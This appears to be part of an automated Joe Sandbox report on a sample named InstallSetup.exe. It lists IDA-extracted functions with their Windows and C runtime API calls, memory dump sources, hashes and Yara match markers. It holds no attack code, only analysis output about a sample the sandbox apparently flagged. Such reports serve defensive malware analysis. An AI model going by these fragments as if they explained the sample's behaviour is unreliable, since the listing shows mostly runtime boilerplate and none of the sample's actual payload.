                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Users\user\Desktop\InstallSetup.exe
                                                                                                • API String ID: 2506810119-1732551550
                                                                                                • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0094C8DE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                • Instruction ID: e995514250175a49ea6453aa01844c5431b252f0e9a07f8f10311f1957ddae18
                                                                                                • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                • Instruction Fuzzy Hash: 5AF02BF28012086FCB84E654CC42FEE33989B55311F14806AED52AB183EA689D05CBA4
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                • String ID: F(@
                                                                                                • API String ID: 3213686812-2698495834
                                                                                                • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                • String ID: F(@
                                                                                                • API String ID: 3213686812-2698495834
                                                                                                • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler
                                                                                                • API String ID: 1381464787-923244539
                                                                                                • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                APIs
                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: pContext
                                                                                                • API String ID: 1990795212-2046700901
                                                                                                • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                • _free.LIBCMT ref: 0042E069
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseFreeHandleLibrary_free
                                                                                                • String ID: B
                                                                                                • API String ID: 621396759-3071617958
                                                                                                • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                APIs
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler$version
                                                                                                • API String ID: 1687795959-3154422776
                                                                                                • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                • Instruction ID: d0bfe9cf5ca868c943d94e0fb4c816d7431caf5a4876eae895433ecc06208343
                                                                                                • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                • Instruction Fuzzy Hash: 15A17C73900B869FD722DF18C8857BEBBE9EF51350F1A816DD48D9B281D2B89D41C750
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                • Instruction ID: 988d5df31e6b2c284b60a51d6136b949836b2320ac5d492665f57ebbde58607e
                                                                                                • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                • Instruction Fuzzy Hash: E2412D33A00504ABDB356FB88C56BAE37A8EF82770F24C675F82CE61D1EB34484146A1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0097047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00976B51
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00976BDA
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00976BEC
                                                                                                • __freea.LIBCMT ref: 00976BF5
                                                                                                  • Part of subcall function 0097390E: RtlAllocateHeap.NTDLL(00000000,0094DAD7,00000000), ref: 00973940
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                • String ID:
                                                                                                • API String ID: 2652629310-0
                                                                                                • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                • Instruction ID: 10321db3b8babd5d79799430e0fb980520eef067799be36f9602406ff1cf528c
                                                                                                • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                • Instruction Fuzzy Hash: 6131D032A0060AABDF25CF69CC41EAE7BA9EB81710B158278FC08D7150EB35DD54CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 531285432-0
                                                                                                • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                • Instruction ID: 768a663444b6cad15b76fb1bd083c74e52f2b45da3cc13c9ffc616190d71622d
                                                                                                • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                • Instruction Fuzzy Hash: A2212F75A011199FDF01EF94DC82EBEB7B9FF49714F100065F505A7291DB74AD019B90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 531285432-0
                                                                                                • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                  • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                • String ID:
                                                                                                • API String ID: 2630251706-0
                                                                                                • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                • UpdateWindow.USER32 ref: 00401FB7
                                                                                                • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$MoveUpdate
                                                                                                • String ID:
                                                                                                • API String ID: 1339878773-0
                                                                                                • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0096934A
                                                                                                  • Part of subcall function 00969297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009692C6
                                                                                                  • Part of subcall function 00969297: ___AdjustPointer.LIBCMT ref: 009692E1
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0096935F
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00969370
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00969398
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction ID: 520432de0fde301552268e432581d634d221317a9d683c6399ebb57f912cd879
                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction Fuzzy Hash: 76011332100148BBCF126E95CC42EEB3F6DEF88754F044018FE58AA221D332E861EBA0
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                  • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                  • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378), ref: 009751C8
                                                                                                • GetLastError.KERNEL32(?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00972213), ref: 009751D4
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 009751E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction ID: c17681c470e04d7490bf397dccdd156e7b77744a9e41f5788b18654674f67f12
                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction Fuzzy Hash: 8E014C376066226BC7604F689C44F567B9CAF06F637224630F81DD3141C760DD00C6E4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 009663AF
                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 009663C3
                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 009663DB
                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 009663F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                • String ID:
                                                                                                • API String ID: 78362717-0
                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction ID: 448cd17333f7ebe6b163d67e82a5e43c49813308fb8f913f1dd5334d78c10847
                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction Fuzzy Hash: 3201A232600114A7CF16EE959841FAF779D9B95350F000016FC11A7392DA71ED1496A0
                                                                                                APIs
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00962BB1
                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00962BCF
                                                                                                  • Part of subcall function 00958687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009586A8
                                                                                                  • Part of subcall function 00958687: Hash.LIBCMT ref: 009586E8
                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00962BD8
                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00962BF8
                                                                                                  • Part of subcall function 0095F6DF: Hash.LIBCMT ref: 0095F6F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                • String ID:
                                                                                                • API String ID: 2250070497-0
                                                                                                • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                • Instruction ID: 7864472d4d4a0498b76f7596ba925d78c216768d1ca66f2f9cdd2051225573f2
                                                                                                • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                • Instruction Fuzzy Hash: 08118E76800604AFC715DF65C881ACAF7F8FF99320F00465EE95687592DB70E904CBA0
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                • String ID:
                                                                                                • API String ID: 78362717-0
                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                APIs
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00962BB1
                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00962BCF
